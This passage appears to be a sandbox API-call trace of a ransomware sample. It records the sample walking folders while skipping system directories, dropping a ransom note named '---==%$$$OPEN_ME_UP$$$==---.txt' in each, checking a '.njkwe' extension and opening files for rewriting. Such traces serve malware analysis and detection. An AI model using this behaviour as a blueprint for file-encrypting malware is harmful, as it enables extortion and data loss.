lstrcmpiW (lpString1="PerfLogs", lpString2="System Volume Information") returned -1 [0067.280] lstrcmpiW (lpString1="PerfLogs", lpString2="Program Files") returned -1 [0067.280] lstrcmpiW (lpString1="PerfLogs", lpString2="Program Files (x86)") returned -1 [0067.280] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0067.280] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0067.280] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0067.280] lstrcmpW (lpString1="\\\\?\\C:\\PerfLogs", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.280] GetProcessHeap () returned 0xbe0000 [0067.280] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc263f8 [0067.280] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\*") returned 17 [0067.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2e0 [0067.281] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.281] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.281] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.281] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.281] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.281] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\.") returned 17 [0067.281] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.281] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.281] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.281] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.282] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.282] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.282] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.282] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\..") returned 18 [0067.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.282] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0067.282] FindClose (in: hFindFile=0xc1a2e0 | out: hFindFile=0xc1a2e0) returned 1 [0067.282] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 47 [0067.282] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\perflogs\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0067.282] WriteFile (in: hFile=0x424, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380fa74, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380fa74*=0x351, lpOverlapped=0x0) returned 1 [0067.283] CloseHandle (hObject=0x424) returned 1 [0067.283] GetProcessHeap () returned 0xbe0000 [0067.283] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc263f8 | out: hHeap=0xbe0000) returned 1 [0067.283] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x2f69a064, ftLastAccessTime.dwHighDateTime=0x1d5c439, ftLastWriteTime.dwLowDateTime=0x2f69a064, ftLastWriteTime.dwHighDateTime=0x1d5c439, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0067.283] lstrcmpiW (lpString1="Program Files", lpString2="Windows") returned -1 [0067.283] lstrcmpiW (lpString1="Program Files", lpString2="$Recycle.bin") returned 1 [0067.283] lstrcmpiW (lpString1="Program Files", lpString2="System Volume Information") returned -1 [0067.283] lstrcmpiW (lpString1="Program Files", lpString2="Program Files") returned 0 [0067.284] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7511354, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe7511354, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0067.284] lstrcmpiW (lpString1="Program Files (x86)", lpString2="Windows") returned -1 [0067.284] lstrcmpiW (lpString1="Program Files (x86)", lpString2="$Recycle.bin") returned 1 [0067.284] lstrcmpiW (lpString1="Program Files (x86)", lpString2="System Volume Information") returned -1 [0067.284] lstrcmpiW (lpString1="Program Files (x86)", lpString2="Program Files") returned 1 [0067.284] lstrcmpiW (lpString1="Program Files (x86)", lpString2="Program Files (x86)") returned 0 [0067.284] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0067.284] lstrcmpiW (lpString1="ProgramData", lpString2="Windows") returned -1 [0067.284] lstrcmpiW (lpString1="ProgramData", lpString2="$Recycle.bin") returned 1 [0067.284] lstrcmpiW (lpString1="ProgramData", lpString2="System Volume Information") returned -1 [0067.284] lstrcmpiW (lpString1="ProgramData", lpString2="Program Files") returned 1 [0067.284] lstrcmpiW (lpString1="ProgramData", lpString2="Program Files (x86)") returned 1 [0067.284] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData") returned 18 [0067.284] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0067.284] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0067.284] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.284] GetProcessHeap () returned 0xbe0000 [0067.284] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc263f8 [0067.284] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\*") returned 20 [0067.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\*", lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19f60 [0067.284] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.284] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.284] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.284] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.284] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.284] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\.") returned 20 [0067.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.284] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0067.284] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0067.284] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0067.285] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.285] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\." (normalized: "c:\\programdata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.285] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.285] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.285] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.285] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.285] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.285] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.285] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\..") returned 21 [0067.285] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.285] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.285] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0067.285] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0067.285] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0067.285] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.285] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.285] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x450f4738, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x4511a9a6, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x4511a9a6, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Adobe", cAlternateFileName="")) returned 1 [0067.285] lstrcmpiW (lpString1="Adobe", lpString2="Windows") returned -1 [0067.285] lstrcmpiW (lpString1="Adobe", lpString2="$Recycle.bin") returned 1 [0067.285] lstrcmpiW (lpString1="Adobe", lpString2="System Volume Information") returned -1 [0067.285] lstrcmpiW (lpString1="Adobe", lpString2="Program Files") returned -1 [0067.285] lstrcmpiW (lpString1="Adobe", lpString2="Program Files (x86)") returned -1 [0067.285] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe") returned 24 [0067.285] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0067.285] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0067.285] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Adobe", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.285] GetProcessHeap () returned 0xbe0000 [0067.285] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.285] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\*") returned 26 [0067.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x450f4738, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x4511a9a6, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x4511a9a6, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1a0 [0067.286] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.286] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.286] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.286] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.286] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.286] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\.") returned 26 [0067.286] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.286] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x450f4738, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x4511a9a6, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x4511a9a6, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.286] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.286] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.286] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.286] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.286] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.286] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\..") returned 27 [0067.286] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.286] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.286] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4511a9a6, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x28e82a8b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x28e82a8b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ARM", cAlternateFileName="")) returned 1 [0067.286] lstrcmpiW (lpString1="ARM", lpString2="Windows") returned -1 [0067.286] lstrcmpiW (lpString1="ARM", lpString2="$Recycle.bin") returned 1 [0067.286] lstrcmpiW (lpString1="ARM", lpString2="System Volume Information") returned -1 [0067.286] lstrcmpiW (lpString1="ARM", lpString2="Program Files") returned -1 [0067.286] lstrcmpiW (lpString1="ARM", lpString2="Program Files (x86)") returned -1 [0067.286] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM") returned 28 [0067.286] lstrcmpW (lpString1="ARM", lpString2=".") returned 1 [0067.286] lstrcmpW (lpString1="ARM", lpString2="..") returned 1 [0067.286] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.286] GetProcessHeap () returned 0xbe0000 [0067.286] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0067.287] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*") returned 30 [0067.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4511a9a6, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x28e82a8b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x28e82a8b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19f20 [0067.289] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.289] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.289] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.289] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.289] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.289] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\.") returned 30 [0067.289] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.289] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4511a9a6, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x28e82a8b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x28e82a8b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.289] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.289] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.289] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.289] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.289] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.289] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\..") returned 31 [0067.289] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.289] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.289] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53050818, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xfb2ddff7, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x3268450e, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Reader_15.007.20033", cAlternateFileName="READER~1.200")) returned 1 [0067.289] lstrcmpiW (lpString1="Reader_15.007.20033", lpString2="Windows") returned -1 [0067.289] lstrcmpiW (lpString1="Reader_15.007.20033", lpString2="$Recycle.bin") returned 1 [0067.289] lstrcmpiW (lpString1="Reader_15.007.20033", lpString2="System Volume Information") returned -1 [0067.289] lstrcmpiW (lpString1="Reader_15.007.20033", lpString2="Program Files") returned 1 [0067.289] lstrcmpiW (lpString1="Reader_15.007.20033", lpString2="Program Files (x86)") returned 1 [0067.289] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033") returned 48 [0067.289] lstrcmpW (lpString1="Reader_15.007.20033", lpString2=".") returned 1 [0067.289] lstrcmpW (lpString1="Reader_15.007.20033", lpString2="..") returned 1 [0067.289] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.291] GetProcessHeap () returned 0xbe0000 [0067.291] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0067.291] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033\\*") returned 50 [0067.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53050818, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xfb2ddff7, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x3268450e, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1e0 [0067.292] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.292] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.292] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.292] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.292] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.292] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033\\.") returned 50 [0067.292] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.293] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53050818, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xfb2ddff7, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x3268450e, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.293] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.293] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.293] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.293] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.293] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.293] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033\\..") returned 51 [0067.293] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.293] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.293] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53050818, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xfb2ddff7, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x3268450e, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0067.293] FindClose (in: hFindFile=0xc1a1e0 | out: hFindFile=0xc1a1e0) returned 1 [0067.293] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 80 [0067.293] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\adobe\\arm\\reader_15.007.20033\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0067.370] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0067.371] CloseHandle (hObject=0x430) returned 1 [0067.371] GetProcessHeap () returned 0xbe0000 [0067.371] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0067.371] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8d2868f, ftCreationTime.dwHighDateTime=0x1d38c43, ftLastAccessTime.dwLowDateTime=0xa7140105, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xa7140105, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Reader_15.023.20070", cAlternateFileName="READER~2.200")) returned 1 [0067.371] lstrcmpiW (lpString1="Reader_15.023.20070", 